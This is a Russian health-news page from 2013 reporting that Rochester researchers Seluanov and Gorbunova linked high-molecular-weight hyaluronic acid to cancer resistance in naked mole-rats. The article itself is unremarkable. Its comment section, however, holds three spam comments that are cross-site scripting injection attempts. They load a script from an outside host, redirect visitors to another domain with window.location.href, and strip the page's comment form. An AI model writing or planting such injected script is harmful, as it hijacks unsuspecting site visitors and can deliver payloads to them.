Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Русские спасут планету от...  >>  Русские спасут планету от рака! С помощью лысых крыс!
 
Обратная связь
 

Русские спасут планету от рака! С помощью лысых крыс!

Размер шрифта
24 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Голые землекопы – уникальные животные. Исследователи из Университета Рочестера (США, штат Нью-Йорк) обнаружили вещество, которое делает этих грызунов невосприимчивыми к онкологическим заболеваниям.

Русские спасут планету от рака! С помощью лысых крыс!

«Это открытие может в перспективе стать основой для разработки новых противоопухолевых средств», – говорят ведущие научные сотрудники исследовательской группы: Андрей Селуанов и Вера Горбунова. Результаты их работы были опубликованы в июньском номере журнала Nature, который является общепризнанным флагманом мировой научной прессы.

Голые землекопы – это маленькие безволосые грызуны, живущие в почве. Уникальная их особенность заключается в том, что они не болеют раком. (Притом, что живут до 30 лет, – невероятный срок по меркам грызунов).

Ученые выяснили, что в тканях этих животных содержится очень много высокомолекулярной гиалуроновой кислоты (далее – ВМГК). Это соединение в норме входит в состав межклеточного вещества соединительных тканей и выполняет множество важных функций: регенерация (восстановление) тканей, обеспечение межклеточных контактов, миграция и деление клеток и многое другое.

«Мы предположили, что именно это вещество обладает противоопухолевой активностью, и решили это проверить», – рассказывает Селуанов.

Для этого они культивировали образец ткани голого землекопа in vitro (в пробирке). После удаления ВМГК из образца, клетки приобретали способность к опухолевому росту, что отчасти подтверждало выдвинутую гипотезу.

Команда из Рочестера также идентифицировала ген (его название – HAS2), ответственный за выработку ВМГК в тканях голого землекопа. Аналоги этого гена есть и у других млекопитающих, но структурно они отличаются друг от друга. Помимо прочего, ВМГК у голых землекопов очень медленно утилизируется, вместо этого накапливаясь в больших количествах.

Следующим шагом в работе ученых станет испытание ВМГК на мышах. Если все пройдет хорошо, Селуанов и Горбунова попробуют изучить эффективность вещества на человеческих клетках.

«ВМГК уже успешно применяется в медицине – например, кожные инъекции гиалуроновой кислоты используют в борьбе с морщинами», – говорит доктор Горбунова. «Мы же рассчитываем на то, что этот препарат проявит противоопухолевые свойства».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   На что слетаются мухи? Оказывается, на рак!   Стоит ли есть мясо? Хотите ли вы получить рак или нет?  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу
Еда против рака. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.